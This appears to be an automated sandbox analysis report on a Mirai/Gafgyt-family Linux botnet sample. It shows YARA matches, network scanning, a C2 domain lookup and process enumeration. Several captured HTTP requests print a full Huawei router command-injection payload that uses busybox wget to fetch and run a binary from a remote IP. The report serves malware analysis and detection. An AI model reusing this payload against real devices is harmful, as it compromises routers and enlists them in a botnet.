              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: /tmp/jYEvdBHMOI.elf (PID: 5485)Socket: 127.0.0.1:8345Jump to behavior
              Source: unknownTCP traffic detected without corresponding DNS query: 197.214.159.206
              Source: unknownTCP traffic detected without corresponding DNS query: 197.99.226.201
              Source: unknownTCP traffic detected without corresponding DNS query: 197.93.192.152
              Source: unknownTCP traffic detected without corresponding DNS query: 197.31.2.107
              Source: unknownTCP traffic detected without corresponding DNS query: 197.246.115.20
              Source: unknownTCP traffic detected without corresponding DNS query: 197.226.31.129
              Source: unknownTCP traffic detected without corresponding DNS query: 197.232.206.232
              Source: unknownTCP traffic detected without corresponding DNS query: 197.0.66.255
              Source: unknownTCP traffic detected without corresponding DNS query: 197.140.140.62
              Source: unknownTCP traffic detected without corresponding DNS query: 197.202.144.3
              Source: unknownTCP traffic detected without corresponding DNS query: 197.188.219.167
              Source: unknownTCP traffic detected without corresponding DNS query: 197.146.72.185
              Source: unknownTCP traffic detected without corresponding DNS query: 197.245.117.39
              Source: unknownTCP traffic detected without corresponding DNS query: 197.248.211.233
              Source: unknownTCP traffic detected without corresponding DNS query: 197.239.219.107
              Source: unknownTCP traffic detected without corresponding DNS query: 197.228.54.111
              Source: unknownTCP traffic detected without corresponding DNS query: 197.173.97.59
              Source: unknownTCP traffic detected without corresponding DNS query: 197.230.7.29
              Source: unknownTCP traffic detected without corresponding DNS query: 197.211.197.171
              Source: unknownTCP traffic detected without corresponding DNS query: 197.109.217.96
              Source: unknownTCP traffic detected without corresponding DNS query: 197.69.70.246
              Source: unknownTCP traffic detected without corresponding DNS query: 197.162.136.12
              Source: unknownTCP traffic detected without corresponding DNS query: 197.207.20.109
              Source: unknownTCP traffic detected without corresponding DNS query: 197.147.55.36
              Source: unknownTCP traffic detected without corresponding DNS query: 197.116.59.170
              Source: unknownTCP traffic detected without corresponding DNS query: 197.196.146.127
              Source: unknownTCP traffic detected without corresponding DNS query: 197.178.54.120
              Source: unknownTCP traffic detected without corresponding DNS query: 197.2.193.202
              Source: unknownTCP traffic detected without corresponding DNS query: 197.65.90.121
              Source: unknownTCP traffic detected without corresponding DNS query: 197.182.130.96
              Source: unknownTCP traffic detected without corresponding DNS query: 197.163.194.110
              Source: unknownTCP traffic detected without corresponding DNS query: 197.60.222.227
              Source: unknownTCP traffic detected without corresponding DNS query: 197.36.25.162
              Source: unknownTCP traffic detected without corresponding DNS query: 197.158.6.210
              Source: unknownTCP traffic detected without corresponding DNS query: 197.173.16.180
              Source: unknownTCP traffic detected without corresponding DNS query: 197.233.160.236
              Source: unknownTCP traffic detected without corresponding DNS query: 197.161.217.36
              Source: unknownTCP traffic detected without corresponding DNS query: 197.225.41.153
              Source: unknownTCP traffic detected without corresponding DNS query: 197.51.150.222
              Source: unknownTCP traffic detected without corresponding DNS query: 197.220.94.58
              Source: unknownTCP traffic detected without corresponding DNS query: 197.201.150.43
              Source: unknownTCP traffic detected without corresponding DNS query: 197.51.157.219
              Source: unknownTCP traffic detected without corresponding DNS query: 197.119.207.203
              Source: unknownTCP traffic detected without corresponding DNS query: 197.95.31.11
              Source: unknownTCP traffic detected without corresponding DNS query: 197.129.254.170
              Source: unknownTCP traffic detected without corresponding DNS query: 197.179.202.34
              Source: unknownTCP traffic detected without corresponding DNS query: 197.90.15.109
              Source: unknownTCP traffic detected without corresponding DNS query: 197.169.135.160
              Source: unknownTCP traffic detected without corresponding DNS query: 197.23.60.82
              Source: unknownTCP traffic detected without corresponding DNS query: 197.17.180.178
              Source: global trafficDNS traffic detected: DNS query: securecameoutgay.ddns.net
              Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: jYEvdBHMOI.elfString found in binary or memory: http://185.196.10.215/bins/mips;
              Source: jYEvdBHMOI.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: jYEvdBHMOI.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

              System Summary

              barindex
              Source: jYEvdBHMOI.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: jYEvdBHMOI.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: jYEvdBHMOI.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
              Source: jYEvdBHMOI.elf, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 5485.1.00007ff360011000.00007ff360022000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 5485.1.00007ff360011000.00007ff360022000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: 5485.1.00007ff360011000.00007ff360022000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
              Source: 5485.1.00007ff360011000.00007ff360022000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: Process Memory Space: jYEvdBHMOI.elf PID: 5485, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: jYEvdBHMOI.elf PID: 5485, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: jYEvdBHMOI.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: jYEvdBHMOI.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: jYEvdBHMOI.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
              Source: jYEvdBHMOI.elf, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 5485.1.00007ff360011000.00007ff360022000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5485.1.00007ff360011000.00007ff360022000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: 5485.1.00007ff360011000.00007ff360022000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
              Source: 5485.1.00007ff360011000.00007ff360022000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: Process Memory Space: jYEvdBHMOI.elf PID: 5485, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: jYEvdBHMOI.elf PID: 5485, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: classification engineClassification label: mal100.troj.linELF@0/0@16681/0
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/1583/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/2672/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/110/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/111/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/112/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/113/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/234/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/1577/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/114/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/235/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/115/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/116/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/117/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/118/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/119/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/10/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/917/cmdlineJump to behavior
              Source: /tmp/jYEvdBHMOI.elf (PID: 5489)File opened: /proc/11/cmdlineJump to behavior
